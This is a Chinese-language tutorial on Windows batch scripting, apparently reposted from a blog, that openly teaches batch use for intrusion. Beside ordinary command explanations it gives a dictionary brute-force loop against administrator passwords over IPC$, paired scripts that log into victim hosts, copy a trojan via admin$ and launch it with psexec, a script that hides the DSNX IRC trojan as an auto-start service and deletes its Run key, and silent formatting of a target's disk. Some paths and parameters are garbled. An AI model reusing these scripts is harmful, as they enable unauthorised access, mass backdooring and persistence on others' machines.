Windows 批處理bat程式設計簡明教程

原文地址：http://zhaohaolin.iteye.com/blog/1171031

                                       
前言 
    最近對於批處理技術的探討比較熱，也有不少好的批次程式發布，但是如果沒有一定的相關知識恐怕不容易看懂和理解這些批次檔，也就更談不上自己動手編 寫了，古語云：“授人以魚，不如授人以漁。”因為網上好像並沒有一個比較完整的教材,所以抽一點時間寫了這片給新手朋友們.也獻給所有為實現網路的自由與 共用而努力的朋友們. 
    批次檔是無格式的文字檔，它包含一條或多條命令。它的副檔名為 .bat 或 .cmd。在命令提示下鍵入批次檔的名稱，或者雙擊該批次檔，系統就會調用cmd.exe按照該檔案中各個命令出現的順序來逐個運行它們。使用批 處理檔案（也被稱為批次程式或指令碼），可以簡化日常或重複性任務。當然我們的這個版本的主要內容是介紹批處理在入侵中一些實際運用，例如我們後面要提到 的用批次檔來給系統打補丁、批量植入後門程式等。下面就開始我們批處理學習之旅吧。 
一.簡單批處理內部命令簡介 
1.echo 命令 
    開啟回顯或關閉請求回顯功能，或顯示訊息。如果沒有任何參數，echo 命令將顯示當前回顯設定。 
    文法 
    echo [] [message] 
    Sample：@echo off / echo hello world 
    在實際應用中我們會把這條命令和重新導向符號（也稱為管道符號，一般用> >> ^）結合來實現輸入一些命令到特定格式的檔案中.這將在以後的例子中體現出來。
2.@ 命令 
    表示不顯示@後面的命令，在入侵過程中（例如使用批處理來格式化敵人的硬碟）自然不能讓對方看到你使用的命令啦。 
    Sample：@echo off 
    @echo Now initializing the program,please wait a minite... 
    @format X: /q/u/autoset (format 這個命令是不可以使用/y這個參數的，可喜的是微軟留了個autoset這個參數給我們，效果和/y是一樣的。win2k不支援) 
3.goto 命令 
    指定跳轉到標籤，找到標籤後，程式將處理從下一行開始的命令。 
    文法：goto label （label是參數，指定所要轉向的批次程式中的行。） 
    Sample： 
    if =={} goto noparms 
    if =={} goto noparms（如果這裡的if、%1、%2你不明白的話，先跳過去，後面會有詳細的解釋。） 
    @Rem check parameters if null show usage 
    :noparms 
    echo Usage: monitor.bat ServerIP PortNumber 
    goto end 
    標籤的名字可以隨便起，但是最好是有意義的字母啦，字母前加個：用來表示這個字母是標籤，goto命令就是根據這個：來尋找下一步跳到到那裡。最好有一些說明這樣你別人看起來才會理解你的意圖啊。 
4.rem 命令 
    注釋命令，在C語言中相當與/*--------*/,它並不會被執行，只是起一個注釋的作用，便於別人閱讀和你自己日後修改。 
    Rem Message 
    Sample：@Rem Here is the description. 
5.pause 命令 
    運行 Pause 命令時，將顯示下面的訊息： 
    Press any key to continue . . . 
    Sample： 
    @echo off 
    :begin 
    copy a:*.* d：back 
    echo Please put a new disk into driver A 
    pause 
    goto begin 
    在這個例子中，磁碟機 A 中磁碟上的所有檔案均複製到d:back中。顯示的注釋提示您將另一張磁碟放入磁碟機 A 時，pause 命令會使程式掛起，以便您更換磁碟，然後按任意鍵繼續處理。 
6.call 命令 
    從一個批次程式調用另一個批次程式，並且不終止父批次程式。call 命令接受用作調用目標的標籤。如果在指令碼或批次檔外使用 Call，它將不會在命令列起作用。 
    文法 
    call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 
    參數 
    [Drive:}[Path] FileName 
    指定要調用的批次程式的位置和名稱。filename 參數必須具有 .bat 或 .cmd 副檔名。 
7.start 命令 
    調用外部程式，所有的DOS命令和命令列程式都可以由start命令來調用。 
    入侵常用參數： 
    MIN 開始時視窗最小化 
    SEPARATE 在分開的空間內開始 16 位 Windows 程式 
    HIGH 在 HIGH 優先順序類別開始應用程式 
    REALTIME 在 REALTIME 優先順序類別開始應用程式 
    WAIT 啟動應用程式並等候它結束 
    parameters 這些為傳送到命令/程式的參數 
    執行的應用程式是 32-位 GUI 應用程式時，CMD.EXE 不等應用程式終止就返回命令提示。如果在命令指令碼內執行，該新行為則不會發生。 
8.choice 命令(win2k已失效) 
    choice 使用此命令可以讓使用者輸入一個字元，從而運行不同的命令。使用時應該加/c:參數，c:後應寫提示可輸入的字元，之間無空格。它的返回碼為1234…… 
如: choice /c:dme defrag,mem,end 
    將顯示 
    defrag,mem,end[D,M,E]? 
    Sample： 
    Sample.bat的內容如下: 
    @echo off 
    choice /c:dme defrag,mem,end 
    if errorlevel 3 goto defrag （應先判斷數值最高的錯誤碼） 
    if errorlevel 2 goto mem 
    if errotlevel 1 goto end 
    :defrag 
    c:dosdefrag 
    goto end 
    :mem 
    mem 
    goto end 
    :end 
    echo good bye 
    此檔案運行後，將顯示 defrag,mem,end[D,M,E]? 使用者可選擇d m e ，然後if語句將作出判斷，d表示執行標號為defrag的程式段，m表示執行標號為mem的程式段，e表示執行標號為end的程式段，每個程式段最後都 以goto end將程式跳到end標號處，然後程式將顯示good bye，檔案結束。 
9.If 命令 
    if 表示將判斷是否符合規定的條件，從而決定執行不同的命令。 有三種格式: 
    1、if "參數" == "字串" 　待執行的命令 
    參數如果等於指定的字串，則條件成立，運行命令，否則運行下一句。(注意是兩個等號） 
    如if "%1"=="a" format a: 
    if =={} goto noparms 
    if =={} goto noparms 
    2、if exist 檔案名稱　 待執行的命令 
    如果有指定的檔案，則條件成立，運行命令，否則運行下一句。 
    如if exist config.sys edit config.sys 
    3、if errorlevel / if not errorlevel 數字　 待執行的命令 
    如果返回碼等於指定的數字，則條件成立，運行命令，否則運行下一句。 
    如if errorlevel 2 goto x2 　 
    DOS程式運行時都會返回一個數字給DOS，稱為錯誤碼errorlevel或稱返回碼，常見的返回碼為0、1。 
10.for 命令 
    for 命令是一個比較複雜的命令，主要用於參數在指定的範圍內迴圈執行命令。在批次檔中使用 FOR 命令時，指定變數請使用 %%variable 
    for in (set) do command [CommandLineOptions] 
        %variable 指定一個單一字母可替換的參數。 
        (set) 指定一個或一組檔案。可以使用萬用字元。 
        command 指定對每個檔案執行的命令。 
        command-parameters 為特定命令指定參數或命令列開關。 
        在批次檔中使用 FOR 命令時，指定變數請使用 %%variable，而不要用 %variable。變數名稱是區分大小寫，所以 %i 不同於 %I 
    如果命令副檔名被啟用，下列額外的 FOR 命令格式會受到支援: 
    FOR /D %variable IN (set) DO command [command-parameters] 
    如果集中包含萬用字元，則指定與目錄名匹配，而不與檔案名稱匹配。 
    FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters] 
    檢查以 [drive:]path 為根的分類樹，指向每個目錄中的FOR 語句。如果在 /R 後沒有指定目錄，則使用目前的目錄。如果集僅為一個單點(.)字元，則枚舉該分類樹。 
    FOR /L %variable IN (start,step,end) DO command [command-parameters] 
    該集表示以增量形式從開始到結束的一個數字序列。 因此，(1,1,5) 將產生序列 1 2 3 4 5，(5,-1,1) 將產生 序列 (5 4 3 2 1)。 
    FOR /F ["options"] %variable IN (filenameset) DO command 
    FOR /F ["options"] %variable IN ("string") DO command 
    FOR /F ["options"] %variable IN (`command`) DO command
或者，如果有 usebackq 選項: 
    FOR /F ["options"] %variable IN (file-set) DO command 
    FOR /F ["options"] %variable IN ("string") DO command 
    FOR /F ["options"] %variable IN (`command`) DO command 
    filenameset 為一個或多個檔案名稱。繼續到 filenameset 中的下一個檔案之前，每份檔案都已被開啟、讀取並經過處理。 處理包括讀取檔案，將其分成一行行的文字，然後將每行解析成零或更多的符號。然後用已找到的符號字串變數值調用 For 迴圈。以預設，/F 通過每個檔案的每一行中分開的第一個空白符號。跳過空白行。您可通過指定可選 "options" 參數替代預設解析操作。這個帶引號的字串包括一個或多個指定不同解析選項的關鍵字。這些關鍵字為: 
    eol=c - 指一個行注釋字元的結尾(就一個) 
    skip=n - 指在檔案開始時忽略的行數。 
    delims=xxx - 指分隔字元集。這個替換了空格和跳格鍵的預設分隔符號集。 
    tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代的 for 本身。這會導致額外變數名稱的格式為一個範圍。通過 n 符號指定 m 符號字串中的最後一個字元星號， 那麼額外的變數將在最後一個符號解析之分配並接受行的保留文本。 
    usebackq - 指定新文法已在下類情況中使用: 在作為命令執行一個後引號的字串並且引號字元為文字字串命令並允許在 fi 中使用雙引號擴起檔案名稱。 
sample1: 
    FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 
   會分析 myfile.txt 中的每一行，忽略以分號打頭的那些行，將每行中的第二個和第三個符號傳遞給 for 程式體；用逗號和/或空格定界符號。請注意，這個 for 程式體的語句引用 %i 來取得第二個符號，引用 %j 來取得第三個符號，引用 %k 來取得第三個符號後的所有剩餘符號。對於帶有空格的檔案名稱，您需要用雙引號將檔案名稱括起來。為了用這種方式來使用雙引號，您還需要使用 usebackq 選項，否則，雙引號會被理解成是用作定義某個要分析的字串的。 
    %i 專門在 for 語句中得到說明，%j 和 %k 是通過 tokens= 選項專門得到說明的。您可以通過 tokens= 一行指定最多 26 個符號，只要不試圖說明一個高於字母 “z” 或 “Z” 的變數。請記住，FOR 變數是單一字母、分大小寫和全域的；同時不能有 52 個以上都在使用中。 
    您還可以在相鄰字串上使用 FOR /F 分析邏輯；方法是，用單引號將括弧之間的 filenameset 括起來。這樣，該字串會被當作一個檔案中的一個單一輸入行。 
    最後，您可以用 FOR /F 命令來分析命令的輸出。方法是，將括弧之間的 filenameset 變成一個反括字串。該字串會被當作命令列，傳遞到一個子 CMD.EXE，其輸出會被抓進記憶體，並被當作檔案分析。因此，以下例子: 
    FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 
    會枚舉當前環境中的環境變數名稱。 
    另外，FOR 變數參照的替換已被增強。您現在可以使用下列 
    選項文法: 
    ~I - 刪除任何引號(")，擴充 %i 
    %~fi - 將 %i 擴充到一個完全合格的路徑名 
    %~di - 僅將 %i 擴充到一個磁碟機代號 
    %~pi - 僅將 %i 擴充到一個路徑 
    %~ni - 僅將 %i 擴充到一個檔案名稱 
    %~xi - 僅將 %i 擴充到一個副檔名 
    %~si - 擴充的路徑只含有短名 
    %~ai - 將 %i 擴充到檔案的檔案屬性 
    %~ti - 將 %i 擴充到檔案的日期/時間 
    %~zi - 將 %i 擴充到檔案的大小 
    %~$PATH:i - 尋找列在路徑環境變數的目錄，並將 %i 擴充到找到的第一個完全合格的名稱。如果環境變數未被定義，或者沒有找到檔案，此按鍵組合會擴充Null 字元串 
    可以組合修飾符來得到多重結果: 
    %~dpi - 僅將 %i 擴充到一個磁碟機代號和路徑 
    %~nxi - 僅將 %i 擴充到一個檔案名稱和副檔名 
    %~fsi - 僅將 %i 擴充到一個帶有短名的完整路徑名 
    %~dp$PATH:i - 尋找列在路徑環境變數的目錄，並將 %i 擴充 
    到找到的第一個磁碟機代號和路徑。 
    %~ftzai - 將 %i 擴充到類似輸出線路的 dir
    在以上例子中，%i 和 PATH 可用其他有效數值代替。%~ 文法用一個有效 FOR 變數名終止。選取類似 %i 的大寫變數名比較易讀，而且避免與不分大小寫按鍵組合混淆。 
    以上是MS的官方協助，下面我們舉幾個例子來具體說明一下For命令在入侵中的用途。 
    sample2： 
    利用For命令來實現對一台目標Win2k主機的暴力密碼破解。 
    我們用net use ipipc$ "password" /u:"administrator"來嘗試這和目標主機進行串連，當成功時記下密碼。 
    最主要的命令是一條：for /f %i in (dict.txt) do net use ipipc$ "%i" /u:"administrator" 
    用%i來表示admin的密碼，在dict.txt中這個取%i的值用net use 命令來串連。然後將程式運行結果傳遞給find命令－－ 
    for /f %i in (dict.txt) do net use ipipc$ "%i" /u:"administrator"|find ":命令成功完成">>D:ok.txt ，這樣就ko了。 
    sample3： 
    你有沒有過手裡有大量肉雞等著你去種後門＋木馬呢？，當數量特別多的時候，原本很開心的一件事都會變得很鬱悶：）。文章開頭就談到使用批次檔，可以簡化日常或重複性任務。那麼如何?呢？呵呵，看下去你就會明白了。 
    主要命令也只有一條：（在批次檔中使用 FOR 命令時，指定變數使用 %%variable） 
    @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k 
    tokens的用法請參見上面的sample1，在這裡它表示按順序將victim.txt中的內容傳遞給door.bat中的參數%i %j %k。 
    而cultivate.bat無非就是用net use命令來建立IPC$串連，並copy木馬＋後門到victim，然後用返回碼（If errorlever =）來篩選成功種植後門的主機，並echo出來，或者echo到指定的檔案。 
    delims= 表示vivtim.txt中的內容是一空格來分隔的。我想看到這裡你也一定明白這victim.txt裡的內容是什麼樣的了。應該根據%%i %%j %%k表示的對象來排列，一般就是 ip password username。
代碼雛形： 
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- 
@echo off 
@if "%1"=="" goto usage 
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k 
@goto end 
:usage 
@echo run this batch in dos modle.or just double-click it. 
:end 
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- 
------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- 
@net use %1ipc$ %3 /u:"%2" 
@if errorlevel 1 goto failed 
@echo Trying to establish the IPC$ connection …………OK 
@copy windrv32.exe%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt 
@psexec %1 c:winntsystem32windrv32.exe 
@psexec %1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt 
:failed 
@echo Sorry can not connected to the victim. 
----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 
      這隻是一個自動種植後門批處理的雛形，兩個批處理和後門程式（Windrv32.exe）,PSexec.exe需放在統一目錄下.批處理內容 
尚可擴充,例如:加入清除日誌+DDOS的功能,加入定時添加使用者的功能,更深入一點可以使之具備自動傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究.
二.如何在批次檔中使用參數 
    批處理中可以使用參數，一般從1%到 9%這九個，當有多個參數時需要用shift來移動，這種情況並不多見，我們就不考慮它了。 
    sample1：fomat.bat 
    @echo off 
    if "%1"=="a" format a: 
    :format 
    @format a:/q/u/auotset 
    @echo please insert another disk to driver A. 
    @pause 
    @goto fomat 
    這個例子用於連續地格式化幾張磁碟片，所以用的時候需在dos視窗輸入fomat.bat a，呵呵,好像有點畫蛇添足了～^_^ 
sample2： 
    當我們要建立一個IPC$串連地時候總要輸入一大串命令，弄不好就打錯了，所以我們不如把一些固定命令寫入一個批處理，把肉雞地ip password username 當著參數來賦給這個批處理，這樣就不用每次都打命令了。 
    @echo off 
    @net use 1%ipc$ "2%" /u:"3%" 注意哦，這裡PASSWORD是第二個參數。 
    @if errorlevel 1 echo connection failed 
    怎麼樣,使用參數還是比較簡單的吧？你這麼帥一定學會了^_^. 
三.如何使用組合命令(Compound Command) 
1.& 
    Usage：第一條命令 & 第二條命令 [& 第三條命令...] 
    
    用這種方法可以同時執行多條命令，而不管命令是否執行成功 
    
    Sample： 
    C:>dir z: & dir c:Ex4rch 
    The system cannot find the path specified. 
    Volume in drive C has no label. 
    Volume Serial Number is 0078-59FB 
    
    Directory of c:Ex4rch 
    
    2002-05-14 23:51  . 
    2002-05-14 23:51  .. 
    2002-05-14 23:51 14 sometips.gif 
2.&& 
    Usage：第一條命令 && 第二條命令 [&& 第三條命令...] 
    用這種方法可以同時執行多條命令，當碰到執行出錯的命令後將不執行後面的命令，如果一直沒有出錯則一直執行完所有命令； 
    Sample： 
    C:>dir z: && dir c:Ex4rch 
    The system cannot find the path specified. 
    
    C:>dir c:Ex4rch && dir z: 
    Volume in drive C has no label. 
    Volume Serial Number is 0078-59FB 
    
    Directory of c:Ex4rch 
    
    2002-05-14 23:55  . 
    2002-05-14 23:55  .. 
    2002-05-14 23:55 14 sometips.gif 
    1 File(s) 14 bytes 
    2 Dir(s) 768,671,744 bytes free 
    The system cannot find the path specified. 
    
    在做備份的時候可能會用到這種命令會比較簡單，如： 
    dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:backup 
    如果遠程伺服器上存在backup.mdb檔案，就執行copy命令，若不存在該檔案則不執行copy命令。這種用法可以替換IF exist了 ：） 
    3.|| 
    
    Usage：第一條命令 || 第二條命令 [|| 第三條命令...] 
    
    用這種方法可以同時執行多條命令，當碰到執行正確的命令後將不執行後面的命令，如果沒有出現正確的命令則一直執行完所有命令； 
    
    Sample： 
    C:Ex4rch>dir sometips.gif || del sometips.gif 
    Volume in drive C has no label. 
    Volume Serial Number is 0078-59FB 
    
    Directory of C:Ex4rch 
    
    2002-05-14 23:55 14 sometips.gif 
    1 File(s) 14 bytes 
    0 Dir(s) 768,696,320 bytes free
組合命令使用的例子： 
    sample： 
    @copy trojan.exe %1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt 
四、管道命令的使用 
1.| 命令 
    Usage：第一條命令 | 第二條命令 [| 第三條命令...] 
    將第一條命令的結果作為第二條命令的參數來使用，記得在unix中這種方式很常見。

    sample： 
    time /t>>D:IP.log 
    netstat -n -p tcp|find ":3389">>D:IP.log 
    start Explorer 
    看出來了嗎？用於終端服務允許我們為使用者自訂起始的程式，來實現讓使用者運行下面這個bat，以獲得登入使用者的IP。 
2.>、>>輸出重新導向命令 
    將一條命令或某個程式輸出結果的重新導向到特定檔案中, > 與 >>的區別在於，>會清除調原有檔案中的內容後寫入指定檔案，而>>只會追加內容到指定檔案中，而不會改動其中的內容。 
    sample1： 
    echo hello world>c:hello.txt (stupid example?) 
    sample2: 
    時下DLL木馬盛行，我們知道system32是個捉迷藏的好地方，許多木馬都削尖了腦袋往那裡鑽，DLL馬也不例外，針對這一點我們可以在安裝好系統和 必要的應用程式後，對該目錄下的EXE和DLL檔案作一個記錄：運行CMD--轉換目錄到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 這樣所有的EXE和DLL檔案的名稱都被分別記錄到exeback.txt和dllback.txt中, 日後如發現異常但用傳統的方法查不出問題時,則要考慮是不是系統中已經潛入DLL木馬了.這時我們用同樣的命令將system32下的EXE和DLL檔案 記錄到另外的exeback1.txt和dllback1.txt中,然後運行: CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比較前後兩次的DLL和EXE檔案,並將結果輸入到diff.txt中),這樣我們就能 發現一些多出來的DLL和EXE檔案,然後通過查看建立時間、版本、是否經過壓縮等就能夠比較容易地判斷出是不是已經被DLL木馬光顧了。沒有是最好，如 果有的話也不要直接DEL掉，先用regsvr32 /u trojan.dll將後門DLL檔案登出掉,再把它移到資源回收筒裡，若系統沒有異常反映再將之徹底刪除或者提交給殺毒軟體公司。 
3.& 、<& 
    & 將一個控制代碼的輸出寫入到另一個控制代碼的輸入中。 
    <& 從一個控制代碼讀取輸入並將其寫入到另一個控制代碼輸出中。 
    這些並不常用，也就不多做介紹。 
五.如何用批次檔來操作註冊表 
    在入侵過程中經常回操作註冊表的特定的索引值來實現一定的目的，例如:為了達到隱藏後門、木馬程式而刪除Run下殘餘的索引值。或者建立一個服務用以載入後 門。當然我們也會修改註冊表來加固系統或者改變系統的某個屬性，這些都需要我們對註冊表操作有一定的瞭解。下面我們就先學習一下如何使用.REG檔案來操 作註冊表.(我們可以用批處理來產生一個REG檔案) 關於註冊表的操作，常見的是建立、修改、刪除。 
1.建立 
    建立分為兩種，一種是建立子項(Subkey) 
    
    我們建立一個檔案，內容如下： 
    
    Windows Registry Editor Version 5.00 
    [HKEY_LOCAL_MACHINESOFTWAREMicrosofthacker] 
    
    然後執行該指令碼，你就已經在HKEY_LOCAL_MACHINESOFTWAREMicrosoft下建立了一個名字為“hacker”的子項。 
    另一種是建立一個項目名稱 
    那這種檔案格式就是典型的檔案格式，和你從註冊表中匯出的檔案格式一致，內容如下： 
    Windows Registry Editor Version 5.00 
    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] 
    "Invader"="Ex4rch" 
    "Door"=C:WINNTsystem32door.exe 
    "Autodos"=dword:02 
    這樣就在[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下 
    建立了:Invader、door、about這三個項目 
    Invader的類型是“String value” 
    door的類型是“REG SZ value” 
    Autodos的類型是“DWORD value”
2.修改 
    修改相對來說比較簡單，只要把你需要修改的項目匯出，然後用記事本進行修改，然後匯入（regedit /s）即可。 
3.刪除 
    我們首先來說說刪除一個項目名稱，我們建立一個如下的檔案：

    Windows Registry Editor Version 5.00 
    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] 
    "Ex4rch"=-

    執行該指令碼，[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下的"Ex4rch"就被刪除了；

    我們再看看刪除一個子項，我們建立一個如下的指令碼：

    Windows Registry Editor Version 5.00 
    [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]

    執行該指令碼，[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]就已經被刪除了。 
    相信看到這裡，.reg檔案你基本已經掌握了。那麼現在的目標就是用批處理來建立特定內容的.reg檔案了，記得我們前面說道的利用重新導向符號可以很容易地建立特定類型的檔案。 
    samlpe1:如上面的那個例子,如想產生如下註冊表檔案 
    Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] 
    "Invader"="Ex4rch" 
    "door"=hex:255 
    "Autodos"=dword:000000128 
    只需要這樣： 
    @echo Windows Registry Editor Version 5.00>>Sample.reg 
    
    @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>Sample.reg 
    @echo "Invader"="Ex4rch">>Sample.reg 
    @echo "door"=5>>C:WINNTsystem32door.exe>>Sample.reg 
    @echo "Autodos"=dword:02>>Sample.reg
samlpe2: 
    我們現在在使用一些比較老的木馬時,可能會在註冊表的 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(Runonce、 Runservices、Runexec)]下產生一個索引值用來實現木馬的自啟動.但是這樣很容易暴露木馬程式的路徑,從而導致木馬被查殺,相對地若是將 木馬程式註冊為系統服務則相對安全一些.下面以配置好地IRC木馬DSNX為例(名為windrv32.exe) 
    @start windrv32.exe 
    @attrib +h +r windrv32.exe 
    @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>patch.dll 
    @echo "windsnx "=- >>patch.dll 
    @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe 
    @regedit /s patch.dll 
    @delete patch.dll 
    
    @REM [刪除DSNXDE在註冊表中的啟動項，用sc.exe將之註冊為系統關鍵性服務的同時將其屬性設為隱藏和唯讀，並config為自啟動] 
    @REM 這樣不是更安全^_^.

你可以通過這個連結引用該篇文章:http://starsblue.bokee.com/viewdiary.13821805.html

完